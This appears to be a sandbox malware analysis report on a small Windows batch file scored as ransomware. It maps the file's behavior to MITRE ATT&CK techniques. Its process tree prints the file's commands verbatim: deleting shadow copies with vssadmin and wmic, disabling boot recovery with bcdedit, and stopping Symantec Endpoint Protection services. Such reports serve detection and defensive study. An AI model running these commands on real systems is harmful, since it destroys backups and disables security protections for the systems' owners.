b9089e998c8b58b04f40aafd9957a68d7c3efa42d0a8137db037abeab6b7e117

Analysis

max time kernel
46s
max time network
49s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
12-01-2023 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.bat
Size

714B
MD5

090f5292edb66547a84094521f168cf9
SHA1

3b6b4a4dbfb8642b43624a48a06965dc07c4544f
SHA256

50ac2f51e0bd5a497332633e6705fb206dbcd58523fb9e5d8ed5163e3a76b134
SHA512

14d030744039d646401db5c5e49b2b80218ce05bb07f744b6926751f6d652ee7f809375c37c183f34be2535f6b5c5e5cd3aee8877ea7d130c73e11269b77e427

Score

9^/10

evasion ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1572	bcdedit.exe
1932	bcdedit.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1376	vssadmin.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeBackupPrivilege	952	vssvc.exe
Token: SeRestorePrivilege	952	vssvc.exe
Token: SeAuditPrivilege	952	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1836	WMIC.exe
Token: SeSecurityPrivilege	1836	WMIC.exe
Token: SeTakeOwnershipPrivilege	1836	WMIC.exe
Token: SeLoadDriverPrivilege	1836	WMIC.exe
Token: SeSystemProfilePrivilege	1836	WMIC.exe
Token: SeSystemtimePrivilege	1836	WMIC.exe
Token: SeProfSingleProcessPrivilege	1836	WMIC.exe
Token: SeIncBasePriorityPrivilege	1836	WMIC.exe
Token: SeCreatePagefilePrivilege	1836	WMIC.exe
Token: SeBackupPrivilege	1836	WMIC.exe
Token: SeRestorePrivilege	1836	WMIC.exe
Token: SeShutdownPrivilege	1836	WMIC.exe
Token: SeDebugPrivilege	1836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1836	WMIC.exe
Token: SeRemoteShutdownPrivilege	1836	WMIC.exe
Token: SeUndockPrivilege	1836	WMIC.exe
Token: SeManageVolumePrivilege	1836	WMIC.exe
Token: 33	1836	WMIC.exe
Token: 34	1836	WMIC.exe
Token: 35	1836	WMIC.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 1376	1628	cmd.exe	29
PID 1628 wrote to memory of 1376	1628	cmd.exe	29
PID 1628 wrote to memory of 1376	1628	cmd.exe	29
PID 1628 wrote to memory of 1836	1628	cmd.exe	32
PID 1628 wrote to memory of 1836	1628	cmd.exe	32
PID 1628 wrote to memory of 1836	1628	cmd.exe	32
PID 1628 wrote to memory of 1572	1628	cmd.exe	34
PID 1628 wrote to memory of 1572	1628	cmd.exe	34
PID 1628 wrote to memory of 1572	1628	cmd.exe	34
PID 1628 wrote to memory of 1932	1628	cmd.exe	35
PID 1628 wrote to memory of 1932	1628	cmd.exe	35
PID 1628 wrote to memory of 1932	1628	cmd.exe	35
PID 1628 wrote to memory of 836	1628	cmd.exe	36
PID 1628 wrote to memory of 836	1628	cmd.exe	36
PID 1628 wrote to memory of 836	1628	cmd.exe	36
PID 1628 wrote to memory of 780	1628	cmd.exe	37
PID 1628 wrote to memory of 780	1628	cmd.exe	37
PID 1628 wrote to memory of 780	1628	cmd.exe	37
PID 1628 wrote to memory of 676	1628	cmd.exe	38
PID 1628 wrote to memory of 676	1628	cmd.exe	38
PID 1628 wrote to memory of 676	1628	cmd.exe	38
PID 676 wrote to memory of 592	676	net.exe	39
PID 676 wrote to memory of 592	676	net.exe	39
PID 676 wrote to memory of 592	676	net.exe	39
PID 1628 wrote to memory of 1908	1628	cmd.exe	40
PID 1628 wrote to memory of 1908	1628	cmd.exe	40
PID 1628 wrote to memory of 1908	1628	cmd.exe	40
PID 1908 wrote to memory of 1840	1908	net.exe	41
PID 1908 wrote to memory of 1840	1908	net.exe	41
PID 1908 wrote to memory of 1840	1908	net.exe	41
PID 1628 wrote to memory of 1916	1628	cmd.exe	42
PID 1628 wrote to memory of 1916	1628	cmd.exe	42
PID 1628 wrote to memory of 1916	1628	cmd.exe	42
PID 1916 wrote to memory of 436	1916	net.exe	43
PID 1916 wrote to memory of 436	1916	net.exe	43
PID 1916 wrote to memory of 436	1916	net.exe	43
PID 1628 wrote to memory of 1036	1628	cmd.exe	44
PID 1628 wrote to memory of 1036	1628	cmd.exe	44
PID 1628 wrote to memory of 1036	1628	cmd.exe	44
PID 1036 wrote to memory of 1092	1036	net.exe	45
PID 1036 wrote to memory of 1092	1036	net.exe	45
PID 1036 wrote to memory of 1092	1036	net.exe	45

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\run.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\system32\vssadmin.exe
  vssAdmiN delete shaDows /all /quIet
  2⤵
  - Interacts with shadow copies
  PID:1376
- C:\Windows\System32\Wbem\WMIC.exe
  wMic shadOwcopy dElete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- C:\Windows\system32\bcdedit.exe
  bCdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1572
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\Smc.exe" -stop
  2⤵
  PID:836
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Symantec\Symantec Endpoint Protection\smc.exe" -p 123 -stop
  2⤵
  PID:780
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Endpoint ProtectionΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Endpoint ProtectionΓÇ¥
    3⤵
    PID:592
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Event ManagerΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Event ManagerΓÇ¥
    3⤵
    PID:1840
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Settings ManagerΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Settings ManagerΓÇ¥
    3⤵
    PID:436
- C:\Windows\system32\net.exe
  net stop ΓÇ£Symantec Network Access ControlΓÇ¥
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ΓÇ£Symantec Network Access ControlΓÇ¥
    3⤵
    PID:1092

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads